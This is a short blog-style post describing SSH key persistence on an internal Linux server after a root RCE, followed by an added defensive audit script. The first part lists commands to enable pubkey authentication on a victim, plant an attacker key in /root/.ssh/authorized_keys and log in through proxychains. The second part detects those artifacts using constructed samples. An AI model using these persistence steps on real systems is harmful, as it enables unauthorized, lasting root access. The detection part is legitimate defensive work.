Passwordless login to an internal Linux server through a proxy

Date: 2021-04-07 11:05:28

Scenario: an RCE allows commands to be executed as root, but the password cannot be read.

 

1: On the victim machine, run the following commands to enable key authentication

# echo RSAAuthentication yes >> /etc/ssh/sshd_config
# echo PubkeyAuthentication yes >> /etc/ssh/sshd_config
# systemctl restart sshd

  

2: Back on the local Linux machine, generate a key pair

# ssh-keygen -t rsa -P "" -f ~/.ssh/id_rsa
# ls -al /root/.ssh/
# cp /root/.ssh/id_rsa.pub /home/sot/Desktop/
# mv /home/sot/Desktop/id_rsa.pub /home/sot/Desktop/authorized_keys

  

3: On the victim machine, append the public key to authorized_keys

# echo ssh-rsa AA**+ldFbB root@Riter >> /root/.ssh/authorized_keys

  

4: On the local machine, connect through the proxy

proxychains4 ssh -t -o "StrictHostKeyChecking no" root@172.16.7.28
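
Seen from the defender's side, steps 1 and 3 leave two artifacts on the server: directives appended to /etc/ssh/sshd_config and an extra line in /root/.ssh/authorized_keys. The script below is an added example, not part of the original post; the function names, the approved_keys allowlist file and all sample data are assumptions constructed for illustration.

```shell
#!/bin/sh
# Added example; function names and the approved_keys file are assumptions.
# Flag what step 1 leaves in sshd_config: RSAAuthentication (an SSH protocol 1
# option) and single-valued directives given more than once. sshd uses the
# first value it reads, so an appended duplicate reveals a blind ">>" edit.
audit_sshd_config() {
    awk '
        /^[ \t]*#/ || NF == 0 { next }            # comments and blank lines
        { key = tolower($1) }
        key == "match" { split("", seen); next }  # Match opens a new scope
        key == "rsaauthentication" { printf "deprecated:%d:%s\n", NR, $1 }
        key ~ /^(pubkeyauthentication|passwordauthentication|permitrootlogin)$/ {
            if (key in seen) printf "repeated:%d:%s\n", NR, $1
            seen[key] = 1
        }
    ' "$1"
}

# Flag step 3: keys in authorized_keys ($1) whose base64 blob is not listed in
# the allowlist ($2, one approved blob per line). Option strings that contain
# a key-type token are not handled.
audit_authorized_keys() {
    awk -v allow="$2" '
        BEGIN { while ((getline blob < allow) > 0) ok[blob] = 1 }
        /^[ \t]*#/ || NF == 0 { next }
        {
            for (i = 1; i < NF; i++)
                if ($i ~ /^(ssh-(rsa|dss|ed25519)|ecdsa-sha2-|sk-)/) {
                    k = $(i + 1)
                    if (!(k in ok)) printf "unapproved:%d:%s:%s\n", NR, $i, $(i + 2)
                    next
                }
            printf "unparsed:%d\n", NR
        }
    ' "$1"
}
make_samples() {   # write constructed sample files into directory $1
    printf '%s\n' 'Port 22' 'PermitRootLogin prohibit-password' \
        'PubkeyAuthentication yes' '# baseline ends here' \
        'RSAAuthentication yes' 'PubkeyAuthentication yes' > "$1/sshd_config"
    printf '%s\n' 'ssh-ed25519 AAAAC3approvedKEY ops@bastion' \
        'ssh-rsa AAAAB3unknownKEY root@unknown-host' > "$1/authorized_keys"
    printf '%s\n' 'AAAAC3approvedKEY' > "$1/approved_keys"
}

demo_dir=$(mktemp -d) && make_samples "$demo_dir"
audit_sshd_config "$demo_dir/sshd_config"
audit_authorized_keys "$demo_dir/authorized_keys" "$demo_dir/approved_keys"
rm -rf "$demo_dir"
```

On a real host, point the two functions at /etc/ssh/sshd_config and at each account's authorized_keys, with the allowlist kept somewhere the server itself cannot write.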

  
